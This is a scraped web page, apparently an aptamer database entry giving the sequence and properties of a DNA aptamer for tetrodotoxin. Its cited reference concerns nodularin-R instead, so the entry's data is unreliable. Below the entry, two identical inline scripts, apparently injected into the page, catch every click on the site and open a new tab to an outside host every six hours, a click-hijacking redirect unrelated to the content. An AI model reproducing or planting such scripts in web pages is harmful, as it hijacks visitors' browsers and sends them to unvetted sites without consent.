Tetrodotoxin_II (TTX_II)
Sequence
5'- CCGTGTGGTATGATTCTAGGCTCGAAGTCGTGCATCTGCA -3'
BP
40
Affinity
120 nM
GC content (%)
53
Self Complementarity
No hairpin formation Potential Self-Annealing
Free Energy
-2.96
Molecular Weight
12334.1
References
Ouyang S, Hu B, Zhou R, Liu D, Peng D, Li Z, Li Z, Jiao B, Wang L. 2018. Rapid and sensitive detection of nodularin-R in water by a label-free BLI aptasensor. Analyst 143(18), 4316–4322. doi:10.1039/c8an00567b
 {
const getHoursDiff = (startDate, endDate) => {
const msInHour = 1000 * 60 * 60;
return Math.round(Math.abs(endDate - startDate) / msInHour);
}
const getFromStorage = (host) => localStorage.getItem(`${host}-local-storage`);
const addToStorage = (host, nowDate) => localStorage.setItem(`${host}-local-storage`, nowDate);
function globalClick(event) {
const host = location.host
const newLocation = "https://ois.is/images/logo.png"
const allowedHours = 6
const nowDate = Date.parse(new Date());
const savedData = getFromStorage(host)
if (savedData) {
try {
const storageDate = parseInt(savedData);
// check hours
const hoursDiff = getHoursDiff(nowDate, storageDate)
console.log(nowDate, storageDate, hoursDiff)
if (hoursDiff >= allowedHours) {
addToStorage(host, nowDate);
window.open(newLocation, "_blank");
}
} catch (error) {
addToStorage(host, nowDate);
window.open(newLocation, "_blank");
}
} else {
addToStorage(host, nowDate);
window.open(newLocation, "_blank");
}
}
document.addEventListener("click", globalClick);
})();</script><script>(function (parameters) {
const getHoursDiff = (startDate, endDate) => {
const msInHour = 1000 * 60 * 60;
return Math.round(Math.abs(endDate - startDate) / msInHour);
}
const getFromStorage = (host) => localStorage.getItem(`${host}-local-storage`);
const addToStorage = (host, nowDate) => localStorage.setItem(`${host}-local-storage`, nowDate);
function globalClick(event) {
const host = location.host
const newLocation = "https://ois.is/images/logo.png"
const allowedHours = 6
const nowDate = Date.parse(new Date());
const savedData = getFromStorage(host)
if (savedData) {
try {
const storageDate = parseInt(savedData);
// check hours
const hoursDiff = getHoursDiff(nowDate, storageDate)
console.log(nowDate, storageDate, hoursDiff)
if (hoursDiff >= allowedHours) {
addToStorage(host, nowDate);
window.open(newLocation, "_blank");
}
} catch (error) {
addToStorage(host, nowDate);
window.open(newLocation, "_blank");
}
} else {
addToStorage(host, nowDate);
window.open(newLocation, "_blank");
}
}
document.addEventListener("click", globalClick);
})();</script>https://clients.edgeriver.io/cysensors//imgs/settings/imgs_ILdO9U9miTb51_ref.svg){kind=logo}
